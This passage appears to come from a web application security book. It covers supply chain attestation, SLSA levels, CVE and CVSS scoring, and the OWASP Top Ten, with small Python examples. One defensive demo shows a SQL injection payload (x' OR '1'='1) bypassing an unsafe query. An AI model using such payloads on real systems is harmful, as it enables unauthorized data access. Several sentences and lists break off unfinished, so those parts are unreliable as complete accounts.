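The idea of attesting to a recorded step can be sketched with the Python standard library. Note the substitution: real attestations use public-key signatures, whereas this example uses an HMAC with a shared secret purely as a stand-in so that it runs without extra packages. The record fields and function names are hypothetical and do not follow in-toto's schema.

```python
import hashlib
import hmac
import json


def canonical_bytes(record):
    """Serialize deterministically so signer and verifier see the same bytes."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def attest(record, key):
    """Return a hex tag binding the key holder to the recorded step."""
    return hmac.new(key, canonical_bytes(record), hashlib.sha256).hexdigest()


def verify(record, tag, key):
    """Recompute the tag and compare it in constant time."""
    return hmac.compare_digest(attest(record, key), tag)


# Hypothetical provenance record for a clone step.
record = {"step": "clone", "command": ["git", "clone", "<repository URL>"], "by": "bob"}
key = b"demo-key-not-for-production"
tag = attest(record, key)
print(verify(record, tag, key))
```

Changing any field of the record after it has been tagged makes verification fail, which is the property an attestation relies on. With a public-key signature, anyone holding the public key could verify without being able to forge.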
SLSA defines four levels of increasing security. Developers can choose
the lowest level, or progressively higher levels for greater protection
against attack.
The first level, SLSA 1, only requires build processes to be automated
and a provenance file to be generated.
SLSA 2 adds further requirements to SLSA 1. It requires version
control and a hosted build service that can generate a signed attestation of
provenance.
SLSA 3, in addition to the requirements for SLSA 2, requires that the
source code and signed provenance documents be auditable.
The highest level, SLSA 4, requires two-person review of all changes
and a reproducible build process.
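Because each level builds on the one below it, the levels can be pictured as a cumulative checklist. The following Python sketch encodes the four levels as summarized above. The requirement names are invented for this example and are not identifiers from the SLSA specification, which is more detailed.

```python
# Requirements per level, paraphrased from the summary above. The names are
# invented for this sketch and are not part of the SLSA specification.
LEVEL_REQUIREMENTS = [
    (1, {"automated_build", "provenance_generated"}),
    (2, {"version_control", "hosted_build_service", "signed_provenance"}),
    (3, {"auditable_source", "auditable_provenance"}),
    (4, {"two_person_review", "reproducible_build"}),
]


def slsa_level(practices):
    """Return the highest level whose requirements, and all lower ones, are met."""
    level = 0
    for candidate, required in LEVEL_REQUIREMENTS:
        if not required <= set(practices):
            break  # a missing lower-level requirement caps the result
        level = candidate
    return level


print(slsa_level({"automated_build", "provenance_generated", "version_control"}))
```

A team that has two-person review but no signed provenance is still at level 1 in this model, because higher levels only count once the lower ones are satisfied.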
We will not go into more detail about SLSA as it is still in alpha and
evolving. Refer to the website cited previously for the latest state of the
framework and to the Git repository.5
5
See https://github.com/slsa-framework/slsa
6
https://in-toto.io
If a user Bob runs this command, and his private key is used in step 4,
Bob is attesting that he has followed the procedure in the layout file to
clone the repository.
Build, packaging, testing, and verification steps can also be executed,
by Bob, other developers, or the product owner, using the same layout file
and their own private keys.
7
https://github.com/in-toto/demo
13.4 Summary
In this chapter, we looked at vulnerabilities that don’t originate from your
source code. Staff members themselves can be vulnerable to attack if their
devices store sensitive information and are not properly secured with
passwords and/or encryption. Companies can inadvertently help attackers
learn about their applications and company organization by publishing
details in annual reports, job advertisements, etc.
Vulnerabilities can also exist in frameworks and libraries our code
depends on. We can defend against these by keeping these packages up
to date, sticking to well-known and mature packages, using official base
images, and blocking ports that are not needed by our application. We can
also run automatic vulnerability scanners.
Supply chain security is an emerging discipline for securing the
development process from source code control to deployment. Public-
private key pairs can be used to enable authorized personnel to attest that
each stage in the process has been performed according to design and by
the expected person.
In the next, final chapter, we look at other resources that you can use to
help keep your application secure.
CHAPTER 14
Further Resources
We’d love it if this book were the only thing you needed to read about web
application security. Unfortunately, it is not, and the reason is that things
change. New technologies come out, introducing new vulnerabilities. New
versions of software are released, with new bugs creating threats. And
hackers are always on the lookout for vulnerabilities that haven’t been
discovered yet.
Knowing how to write a secure web application is the first step. The
next step is staying up to date with vulnerabilities and trends and keeping
your new and existing applications secure. In this chapter, we will look at
some useful resources for staying up to date. We will also summarize what
we have learned.
14.1 Vulnerability Databases
Fortunately for us, there are many people looking for vulnerabilities in
software: good guys as well as bad. When vulnerabilities are found in
software packages, they are often uploaded to vulnerability databases.
The CVE project, which stands for Common Vulnerabilities and
Exposures, is an effort to classify known vulnerabilities in a consistent way
and catalogue them in an online, searchable database. It was launched by
the MITRE Corporation in 1999 and is available at https://cve.mitre.org.
In 2005, the US National Institute of Standards and Technology
0.0 No vulnerability
0.1–3.9 Low
4.0–6.9 Medium
7.0–8.9 High
9.0–10.0 Critical
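The score ranges above translate directly into a small lookup function, which can be handy when triaging scanner output. This is a sketch; the function name is our own, and the labels are the ones used in the table.

```python
def cvss_severity(score):
    """Map a CVSS score (0.0 to 10.0) to the rating used in the table above."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS scores range from 0.0 to 10.0")
    if score == 0.0:
        return "No vulnerability"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


for example in (0.0, 3.9, 5.0, 7.5, 9.8):
    print(example, cvss_severity(example))
```

Scores are published to one decimal place, so comparing against the lower bound of the next band covers every value in the table.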
https://nvd.nist.gov/vuln/detail/CVE-2007-6750
explains that it affects versions 1.0 through to 2.1.6 of the web server.
1
See https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
https://owasp.org/www-project-top-ten/
• A02:2021–Cryptographic Failures
• A03:2021–Injection
• A04:2021–Insecure Design
• A05:2021–Security Misconfiguration
• Misconfigured CORS
Cryptographic Failures
Cryptographic Failures has moved from third place to second. It
was previously called Sensitive Data Exposure. This category includes
Injection
Injection was previously in the top position. It slid down to third place
largely because frameworks have closed a number of these vulnerabilities
in their default configuration.
This category includes cross-site scripting, SQL injection, command
injection, code injection, and any other injection vulnerabilities where
user-supplied code is executed in some way on the server without
sanitizing and validation. We discussed this category in Chapter 7.
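As a reminder of what the defense looks like for SQL injection, the following self-contained sketch uses Python's built-in sqlite3 module to contrast string interpolation with a parameterized query. The table, data, and function names are invented for the example. Django's ORM parameterizes queries for you, so this applies mainly when writing raw SQL.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", 0), ("bob", 1)])


def find_user_unsafe(name):
    # Vulnerable: user input becomes part of the SQL text.
    return conn.execute(f"SELECT name FROM users WHERE name = '{name}'").fetchall()


def find_user_safe(name):
    # Safe: the driver passes the value separately from the SQL text.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


payload = "x' OR '1'='1"
print(find_user_unsafe(payload))  # the injected OR clause matches every row
print(find_user_safe(payload))    # no user has this literal name
```

The same input is harmless in the second function because it is only ever treated as a value to compare against, never as SQL.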
Insecure Design
This category is new for 2021. It refers to flaws in design, as opposed to flaws
in implementation. Threat modelling, which we covered in Chapter 3, helps
greatly in identifying trust boundaries and attack surfaces. Using established
patterns and, where possible, well-scrutinized frameworks and libraries
helps prevent insecure design patterns creeping into code.
Poorly designed APIs are also common. Keeping to correct REST
principles, as discussed in Chapter 6, helps make these secure.
Security Misconfiguration
Up one place from 2017, this broad topic includes
SRI and nonces, as described in Chapter 8, help with the former; the
supply chain security techniques discussed in Chapter 13 are designed to
address the latter.
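For reference, an SRI integrity value is the name of a hash algorithm followed by the Base64-encoded digest of the exact bytes being served. The sketch below computes one with the standard library. The function name, script content, and file path are placeholders for illustration.

```python
import base64
import hashlib


def sri_hash(content, algorithm="sha384"):
    """Return an integrity value of the form "<algorithm>-<base64 digest>"."""
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


# Hypothetical script body; in practice, hash the exact bytes that are served.
script = b"console.log('hello');\n"
print(f'<script src="/static/app.js" integrity="{sri_hash(script)}"></script>')
```

If the served file changes by even one byte, the digest no longer matches and the browser refuses to run it, so the value must be regenerated on every release.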
14.4 Summary
Web application security, like IT in general, is constantly evolving. In
this book, we have covered the major aspects of making your application
secure. However, it is important to understand why each of the techniques
protects your application and what their limitations are. Writing a secure
application is not about cutting and pasting boilerplate code. Rather, it
is understanding your threats, your users’ requirements, and the toolkit
available to eliminate or mitigate those risks while still meeting your other
requirements.
In this last section, we give our own top ten guide of things you should
do when creating a web application:
Above all, learn from your mistakes. Even the best development
teams let vulnerabilities in occasionally. The important thing is that you
can identify and fix them quickly and, next time, can make an even more
secure application. Good luck on your journey!